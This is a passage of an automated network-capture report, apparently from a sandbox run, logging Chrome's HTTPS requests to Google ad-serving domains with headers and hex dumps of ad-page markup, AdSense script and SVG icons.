                                                                          Data Ascii: nk:1; flex-shrink:1;}.si102{border-radius:16px;width:32px;}.si133{background-color:#1d2a33;border-radius:2px;font-size:13px;margin-bottom:5px;margin-left:10px;color:#dddddd;}.si135{background-color:#1d2a33;height:100%;}.si143{border-radius:12px;width:24px
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 5f 20 73 69 31 33 33 20 73 70 61 6e 22 3e 52 65 6c 61 74 65 64 20 73 65 61 72 63 68 65 73 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 65 31 22 20 63 6c 61 73 73 3d 22 69 5f 20 64 69 76 20 63 6c 69 63 6b 74 72 61 63 6b 65 64 41 64 5f 6a 73 20 73 69 31 30 31 22 20 73 74 79 6c 65 3d 22 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 66 6c 65 78 2d 64 69
                                                                          Data Ascii: -webkit-flex-direction:row; flex-direction:row;"><span class="p_ si133 span">Related searches</span></div><div id="e1" class="i_ div clicktrackedAd_js si101" style="-ms-flex-direction:row; -webkit-box-orient:horizontal; -webkit-flex-direction:row; flex-di
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 65 6e 3d 22 74 72 75 65 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 64 69 76 20 71 5f 20 73 69 31 30 32 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 66 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 61 64 5f 69 63 6f 6e 73 2f 73 74 61 6e 64 61 72 64 2f 70 75 62 6c 69 73 68 65 72 5f 69 63 6f 6e 5f 69 6d 61 67 65 2f 73 65 61 72 63 68 2e 73 76 67 3f 63 3d 25 32 33 30 66 31 63 32 31 22 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 5f 20 64 69 76 20 73 69 33 33 22 20 73 74 79 6c 65 3d 22 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a
                                                                          Data Ascii: en="true" tabindex="-1" class="div q_ si102"><img src="https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21" alt="" loading="lazy" class="img"></div></div></div><div class="i_ div si33" style="-ms-flex-direction:
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 73 74 61 72 74 3b 20 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 20 61 6c 69 67 6e 2d 69
                                                                          Data Ascii: ent:horizontal; -webkit-flex-direction:row; flex-direction:row;-ms-flex-pack:start; -webkit-box-pack:start; -webkit-justify-content:flex-start; justify-content:flex-start;-ms-flex-align:center; -webkit-box-align:center; -webkit-align-items:center; align-i
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 64 69 76 20 71 5f 20 73 69 31 34 33 20 77 5f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 66 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 61 64 5f 69 63 6f 6e 73 2f 73 74 61 6e 64 61 72 64 2f 70 75 62 6c 69 73 68 65 72 5f 69 63 6f 6e 5f 69 6d 61 67 65 2f 63 68 65 76 72 6f 6e 2e 73 76 67 3f 63 3d 25 32 33 30 66 31 63 32 31 22 20 61 6c 74 3d 22 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 65 32 22 20 63 6c 61 73 73 3d 22 69 5f 20 64 69 76 20 63 6c 69 63 6b 74 72 61 63 6b 65 64 41 64 5f 6a
                                                                          Data Ascii: a-hidden="true" tabindex="-1" class="div q_ si143 w_"><img src="https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21" alt="" loading="lazy" class="img"></div></a></div><div id="e2" class="i_ div clicktrackedAd_j
                                                                          2024-08-29 15:12:22 UTC1390INData Raw: 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 22 3e 3c 64 69 76 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 64 69 76 20 71 5f 20 73 69 31 30 32 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 66 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 61 64 5f 69 63 6f 6e 73 2f 73 74 61 6e 64 61 72 64 2f 70 75 62 6c 69 73 68 65 72 5f 69 63 6f 6e 5f 69 6d 61 67 65 2f 73 65 61 72 63 68 2e 73 76 67 3f 63 3d 25 32 33 30 66 31 63
                                                                          Data Ascii: rection:row; -webkit-box-orient:horizontal; -webkit-flex-direction:row; flex-direction:row;"><div aria-hidden="true" tabindex="-1" class="div q_ si102"><img src="https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          22 | 192.168.2.5 | 53777 | 142.250.184.238 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-08-29 15:12:22 UTC | 555 | OUT | GET /adsense/domains/caf.js?pac=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://syndicatedsearch.goog/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:23 UTC | 844 | IN | HTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/ads-afs-ui
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="ads-afs-ui"
                                                                          Report-To: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]}
                                                                          Content-Length: 153721
                                                                          Date: Thu, 29 Aug 2024 15:12:23 GMT
                                                                          Expires: Thu, 29 Aug 2024 15:12:23 GMT
                                                                          Cache-Control: private, max-age=3600
                                                                          ETag: "2589222798400241366"
                                                                          X-Content-Type-Options: nosniff
                                                                          Link: <https://syndicatedsearch.goog>; rel="preconnect"
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:23 UTC546INData Raw: 69 66 28 21 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 29 7b 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 3d 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 41 6c 74 4c 6f 61 64 65 72 3d 33 3b 76 61 72 20 73 66 66 65 44 61 74 61 5f 3d 7b 73 65 72 76 69 63 65 5f 68 6f 73 74 3a 22 73 79 6e 64 69 63 61 74 65 64 73 65 61 72 63 68 2e 67 6f 6f 67 22 2c 68 61 73 68 3a 22 31 32 30 30 30 38 36 37 35 38 31 34 38 36 32 32 33 32 35 35 22 2c 70 61 63 6b 61 67 65 73 3a 22 64 6f 6d 61 69 6e 73 22 2c 6d 6f 64 75 6c 65 3a 22 61 64 73 22 2c 76 65 72 73 69 6f 6e 3a 22 31 22 2c 6d 3a 7b 63 65 69 3a 22 31 37 33 30 30 30 30 33 2c 31 37 33 30 31
                                                                          Data Ascii: if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"syndicatedsearch.goog",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17300003,17301
                                                                          2024-08-29 15:12:23 UTC1390INData Raw: 72 75 65 2c 22 5f 75 73 65 53 65 72 76 65 72 50 72 6f 76 69 64 65 64 44 6f 6d 61 69 6e 22 3a 74 72 75 65 2c 22 5f 77 61 69 74 4f 6e 43 6f 6e 73 65 6e 74 46 6f 72 46 69 72 73 74 50 61 72 74 79 43 6f 6f 6b 69 65 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 45 6e 68 61 6e 63 65 64 54 61 72 67 65 74 69 6e 67 52 73 6f 6e 63 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 4e 6f 6e 62 6c 6f 63 6b 69 6e 67 53 61 73 43 6f 6f 6b 69 65 22 3a 74 72 75 65 7d 2c 6d 64 70 3a 31 38 30 30 30 30 30 2c 73 73 64 6c 3a 22 59 58 42 77 63 33 42 76 64 43 35 6a 62 32 30 73 59 6d 78 76 5a 33 4e 77 62 33 51 75 59 32 39 74 4c 47 4a 79 4c 6d 4e 76 62 53 78 6a 62 79 35 6a 62 32 30 73 59 32 78 76 64 57 52 6d 63 6d 39 75 64 43 35 75 5a 58 51 73 5a 58 55 75 59 32 39 74 4c 47 68 76 63 48 52 76 4c
                                                                          Data Ascii: rue,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvL
                                                                          2024-08-29 15:12:23 UTC1390INData Raw: 75 72 6e 20 74 68 69 73 2e 6d 65 7d 3b 76 61 72 20 64 3d 22 6a 73 63 6f 6d 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 31 45 39 3e 3e 3e 30 29 2b 22 5f 22 2c 65 3d 30 3b 72 65 74 75 72 6e 20 62 7d 29 3b 0a 71 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 61 3d 53 79 6d 62 6f 6c 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 41 72 72 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79
                                                                          Data Ascii: urn this.me};var d="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",e=0;return b});q("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array
                                                                          2024-08-29 15:12:23 UTC1390INData Raw: 2c 62 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 63 21 3d 22 70 72 6f 74 6f 74 79 70 65 22 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 62 2c 63 29 3b 64 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 63 2c 64 29 7d 65 6c 73 65 20 61 5b 63 5d 3d 62 5b 63 5d 3b 61 2e 70 67 3d 62 2e 70 72 6f 74 6f 74 79 70 65 7d 66 75 6e 63 74 69 6f 6e 20 71 61 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72
                                                                          Data Ascii: ,b);else for(var c in b)if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.pg=b.prototype}function qa(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=ar
                                                                          2024-08-29 15:12:23 UTC1390INData Raw: 69 73 2e 59 63 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 68 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 67 67 28 68 2c 67 29 3a 74 68 69 73 2e 4a 64 28 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 59 63 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 32 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 64 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 31 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 65 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 69 66 28 74 68 69 73 2e 42 21 3d 30 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 73 65 74 74 6c 65 28 22 2b 67 2b 22 2c 20 22 2b 68 2b 22 29 3a 20 50 72 6f 6d 69 73 65 20 61 6c 72 65 61 64 79 20 73 65 74 74 6c 65 64 20 69 6e 20
                                                                          Data Ascii: is.Yc(k);return}typeof h=="function"?this.gg(h,g):this.Jd(g)};b.prototype.Yc=function(g){this.ae(2,g)};b.prototype.Jd=function(g){this.ae(1,g)};b.prototype.ae=function(g,h){if(this.B!=0)throw Error("Cannot settle("+g+", "+h+"): Promise already settled in
                                                                          2024-08-29 15:12:23 UTC1390INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 2e 68 62 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 0a 68 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 73 77 69 74 63 68 28 6c 2e 42 29 7b 63 61 73 65 20 31 3a 67 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 68 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 3a 20 22 2b 6c 2e 42 29 3b 7d 7d 76 61 72 20 6c 3d 74 68 69 73 3b 74 68 69 73 2e 7a 61 3d 3d 6e 75 6c 6c 3f 66 2e 75 64 28 6b 29 3a 74 68 69 73 2e 7a 61 2e 70 75 73 68 28 6b 29 3b 74 68 69 73 2e 4d 64 3d 21 30 7d 3b 62 2e 72 65 73 6f 6c 76 65 3d 64 3b 62 2e 72 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 62 28 66 75 6e 63
                                                                          Data Ascii: .prototype.hb=function(g,h){function k(){switch(l.B){case 1:g(l.Ua);break;case 2:h(l.Ua);break;default:throw Error("Unexpected state: "+l.B);}}var l=this;this.za==null?f.ud(k):this.za.push(k);this.Md=!0};b.resolve=d;b.reject=function(g){return new b(func
                                                                          2024-08-29 15:12:23 UTC1390INData Raw: 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 62 2e 6c 65 6e 67 74 68 3b 65 3e 30 26 26 63 3e 30 3b 29 69 66 28 64 5b 2d 2d 63 5d 21 3d 62 5b 2d 2d 65 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 65 3c 3d 30 7d 7d 29 3b 0a 71 28 22 57 65 61 6b 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 6b 29 7b 74 68 69 73 2e 4b 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6b 29 7b 6b 3d 75 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 66
                                                                          Data Ascii: (c|0,d.length));for(var e=b.length;e>0&&c>0;)if(d[--c]!=b[--e])return!1;return e<=0}});q("WeakMap",function(a){function b(k){this.Ka=(h+=Math.random()+1).toString();if(k){k=u(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}}function c(){}f
                                                                          2024-08-29 15:12:23 UTC1390INData Raw: 3b 6c 2e 6e 65 78 74 21 3d 6c 2e 68 65 61 64 3b 29 72 65 74 75 72 6e 20 6c 3d 6c 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6c 29 7d 3b 6c 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 6b 26 26 74 79 70 65 6f 66 20 6b 3b 6c 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 66 2e 68 61 73 28 6b 29 3f 6c 3d 66 2e 67 65 74 28 6b 29 3a 28 6c 3d 22 22 2b 20 2b 2b 67 2c 66 2e 73 65 74 28 6b 2c 6c 29 29 3a 6c 3d 22 70 5f 22 2b 6b 3b 76 61 72 20 6e 3d 68 5b 30 5d 5b 6c 5d 3b 69 66 28 6e 26 26 72 61 28 68 5b 30 5d 2c 6c 29 29 66 6f 72 28 68 3d 30 3b 68 3c 6e 2e 6c 65 6e 67 74 68 3b
                                                                          Data Ascii: ;l.next!=l.head;)return l=l.next,{done:!1,value:k(l)};l=null}return{done:!0,value:void 0}})}function d(h,k){var l=k&&typeof k;l=="object"||l=="function"?f.has(k)?l=f.get(k):(l=""+ ++g,f.set(k,l)):l="p_"+k;var n=h[0][l];if(n&&ra(h[0],l))for(h=0;h<n.length;
                                                                          2024-08-29 15:12:23 UTC1390INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 58 3d 62 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 68 29 2e 49 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 28 68 3d 64 28 74 68 69 73 2c 68 29 2e 49 29 26 26 68 2e 76 61 6c 75 65 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 5b 68 2e 6b 65 79 2c 68 2e
                                                                          Data Ascii: .prototype.clear=function(){this[0]={};this[1]=this[1].X=b();this.size=0};e.prototype.has=function(h){return!!d(this,h).I};e.prototype.get=function(h){return(h=d(this,h).I)&&h.value};e.prototype.entries=function(){return c(this,function(h){return[h.key,h.
                                                                          2024-08-29 15:12:23 UTC1390INData Raw: 79 70 65 2e 66 69 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 67 2c 66 2c 64 29 29 7b 62 3d 67 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62 7d 7d 29 3b 71 28 22 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 5b 5d 2c
                                                                          Data Ascii: ype.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});q("Object.values",function(a){return a?a:function(b){var c=[],


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          23 | 192.168.2.5 | 53780 | 142.250.186.161 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-08-29 15:12:23 UTC | 748 | OUT | GET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1
                                                                          Host: afs.googleusercontent.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://syndicatedsearch.goog/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:23 UTC788INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: image/svg+xml
                                                                          Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/afs-native-asset-managers
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="afs-native-asset-managers"
                                                                          Report-To: {"group":"afs-native-asset-managers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/afs-native-asset-managers"}]}
                                                                          Content-Length: 391
                                                                          Date: Thu, 29 Aug 2024 15:12:23 GMT
                                                                          Expires: Fri, 30 Aug 2024 14:12:23 GMT
                                                                          Cache-Control: public, max-age=82800
                                                                          Last-Modified: Thu, 20 Jul 2023 22:48:00 GMT
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:23 UTC391INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 27 23 30 66 31 63 32 31 27 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 30 22 20 68 65 69 67 68 74 3d 22 32 30 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 2e 35 20 31 34 68 2d 2e 37 39 6c 2d 2e 32 38 2d 2e 32 37 43 31 35 2e 34 31 20 31 32 2e 35 39 20 31 36 20 31 31 2e 31 31 20 31 36 20 39 2e 35 20 31 36 20 35 2e 39 31 20 31 33 2e 30 39 20 33 20 39 2e 35 20 33 53 33 20 35 2e 39 31 20 33 20 39 2e 35 20 35 2e 39 31 20 31 36 20 39 2e 35 20 31 36 63 31 2e 36 31 20 30 20 33 2e 30 39 2d 2e 35 39 20 34 2e 32 33 2d 31 2e 35 37 6c 2e 32 37 2e 32 38 76 2e 37 39 6c 35 20 34 2e 39 39 4c
                                                                          Data Ascii: <svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 53779 | 142.250.186.161 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:23 UTC | 749 | OUT | GET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1
Host: afs.googleusercontent.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
